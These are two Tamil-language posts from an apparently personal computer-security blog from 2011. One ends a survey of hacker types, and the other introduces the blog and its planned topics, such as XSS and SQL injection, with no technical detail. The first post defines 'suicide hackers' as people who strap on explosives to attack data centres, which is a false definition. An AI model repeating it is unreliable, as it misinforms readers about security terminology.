சரி. இவ்வாறு எவ்வளவு சுருக்கமாக கூறமுடியுமோ அவ்வளவு சுருக்கமாக நான் இந்த கொந்தர்கள் பற்றி கூறியிருந்தேன். ஆனால் இவர்கள் அனைவருக்கும் மேலாக இன்னும் ஒரு பிரிவினர் இருக்கின்றார்கள். அவர்களை SUICIDE HACKERS என்று அழைக்கின்றார்கள். ஏன் என்றால் இவர்கள் தங்கள் உடலில் வெடிபொருட்களை நிறைத்துக்கொண்டு தகவல் மையங்கள் மீது பாய்ந்து தற்கொலை தாக்குதல் நடத்துபவர்கள். இது என்னோ சினிமா பார்த்த மாதிரியே இருக்கு. என்ன அப்படித்தானே? இந்த கணனி பாதுகாப்பு சம்பந்தமான உலகம் சற்று பெரியது தான். வருகின்ற வாரம் ஒரு வித்தியாசமான வீடியோ பதிவுடன் உங்களை சந்திக்கின்றேன்.


அது சரி. எல்லாம் இருக்கட்டும் நான் வந்து எந்த வகை கொந்தர்? நீங்கள் சிந்திப்பது எனக்கு புரிகின்றது. நான் வந்து ஒரு Black hat கொந்தராக இருந்து White hat கொந்தராக மாறியிருக்கின்றேன். ஏன் எதுக்கு என்ற பதிலுடன் அடுத்த பதிவில் சந்திக்கின்றேன்.


நன்றி [Spiderboil66]

  

Monday, 28 February 2011

வணக்கம் மக்களே!




வணக்கம். இதுவும் ஓர் தமிழ் தொழில்நுட்ப பதிவுத்தளம் தான். ஆனால் மற்றவர்களை போன்று உங்களுக்கு எல்லாம் தெரிந்த விடயங்களை எழுதாமல் ஒரு சிலருக்கு மட்டும் தெரிந்த பலராலும் அறியப்படாத கணனி மற்றும் இணைய பாதுகாப்பு தொடர்பான விடயங்களை நான்  உங்களுடன் பகிர்ந்து கொள்ள போகின்றேன். முடிந்தவரை வாரத்திற்கு ஒரு பதிவு என்ற வகையில் பதிவுகளை இடலாம் என எண்ணியுள்ளேன். பார்க்கலாம். நான் ஒன்றும் பதிவுலகத்திற்கு புதியவன் அல்ல. ஏற்கனவே இரண்டு தளங்களை பேணி வந்தேன். நேரமின்மை மற்றும் ஒரு சில சொந்த காரணங்களுக்காக அவற்றை விட்டுத்தள்ள வேண்டிய கட்டாயத்தினால் அவற்றை விட்டு முற்றாக ஒதுங்கி இருந்தேன். சரி. என்னுடைய சொந்த கதை சோகக் கதை எல்லாம் இருக்கட்டும். நாம் விடயத்திற்கு வருவோம்.

இத்தளத்திலே நீங்கள் கணனி பாதுகாப்பு மற்றும் உங்கள் இணையத்தள பாதுகாப்பு போன்ற விடயங்களை பற்றி அறிந்து கொள்ளலாம். அனேகமாக இணையப்பக்கங்களை வடிவமைத்து வழங்கும் Freelancer இதனால் பெரிதும் பயன்பெறலாம். அதைவிட கணனி Hacking, Sniffing போன்ற விடையங்களில் ஆர்வமுள்ளவர்களுக்கும் பிரஜோசனமான ஒரு தளமாக இருக்கும் என்பதில் எந்தவிதமாக சந்தேகமும் வேண்டாம். அத்துடன் சேர்த்து Web security auditing, vulnerable security holes, Shells, XSS, SQL injection போன்ற விடயங்களை பற்றியும் கொஞ்சம் கதைக்கலாம் என இருக்கின்றேன். சரி. இன்றிலிருந்து தொடங்குவோம் எங்கள் வெற்றிப்பயணத்தினை.

நன்றி. [SpiderBoil66]